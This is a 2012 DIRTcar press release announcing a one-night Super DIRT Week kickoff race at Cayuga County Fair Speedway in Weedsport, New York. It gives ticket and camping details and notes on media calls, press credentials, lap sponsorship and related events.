Weedsport venue reopening Oct. 3 for 358-Modifieds, Sportsman
WEEDSPORT, N.Y. – Sept. 2, 2012 – For the first and only time this season, storied Cayuga County Fair Speedway will open for one night only on Wednesday, Oct. 3, with the NAPA Auto Parts Super DIRT Week Kickoff presented by FX Caprara.
The NAPA Auto Parts Super DIRT Week satellite event is the only chance this year to see racing at Weedsport’s 3/8-mile oval, an original member track of the DIRTcar Northeast sanctioning organization, that has been in idle all year. The special night will include a 75-lap DIRTcar 358-Modified Series feature in addition to a 30-lap race for the DIRTcar Sportsman Modified Series.
Adult general admission tickets are $25 and can only be purchased at the gate. Entry for children 17 and under is FREE! Camping is available on the Cayuga County Fairgrounds for $20 per night and sites with water and electric are available on a first-come, first-serve basis.
Grandstand gates open at 5 p.m. and racing starts at 7:30 p.m. Pit gates open at 4 p.m. and access to the pits is $25 each for DIRTcar Members and $35 each for nonmembers. Reserved Camping at Syracuse Sold Out, General Camping Available: Reserved camping spots at the New York State Fairgrounds in Syracuse during Super DIRT Week, Oct. 3-7, are sold out. Weekly Media Call-Ins Continue with Brett Hearn: For the fourth consecutive season, DIRTcar will run weekly conference calls for Super DIRT Week media members. The next media call will be 3 p.m. Tuesday, Sept. 4, and will feature seven-time Super DIRTcar Series titlist Brett Hearn. The calls run each Tuesday at 3 p.m. through September 25 and feature question-and-answer sessions with Super DIRT Week drivers and notables. Super DIRT Week Media Credentials: Media members who desire access to NAPA Auto Parts Super DIRT Week XLI must apply for credentials no later than Friday, Sept. 14. Credential requests should be made by the supervising editor on company letterhead, indicate the medium represented, the area of access required and provide contact information (address, phone, and e-mail). If approved, media members will receive a voucher that will need to be turned in and verified with photo ID at the Gate 6 ticket office to receive access. Credential requests for events at the New York State Fairgrounds and Rolling Wheels Raceway Park can be submitted to Super DIRT Week Credentials, DIRTcar Racing, P.O. Box 240, Weedsport, NY 13166, or a PDF on letterhead can be e-mailed to jfoy@dirtcar.com.
Hall of Fame Lap Sponsorship: Parties interested in sponsoring a lap during Super DIRT Week XLI can go to www.SuperDIRTWeekOnline.com and click the “Lap Sponsor App” button in the right-hand column to print out the form for details on how to sponsor a lap.
Double Dose of Outlaws: The World of Outlaws Sprint Cars and World of Outlaws Late Models will be in action during Super DIRT Week, joining the DIRTcar Nationals in Volusia and World Finals at Charlotte as the only events where all three premier dirt-racing divisions are in action at the same general location. The Late Models are in action on Thursday night at Rolling Wheels Raceway joining the DIRTcar 358-Modified Series, while the Sprint Cars join the popular Big-Block Modified “Win-and-You’re-In” event on Saturday night at Rolling Wheels Raceway.
Weathering Friday Night Under the Lights: CNY Central Meteorologist Peter Hall on NBC Channel 3 brings the popular Weather Deck Party to Friday night “Under the Lights” Oct. 5 at the New York State Fairgrounds.
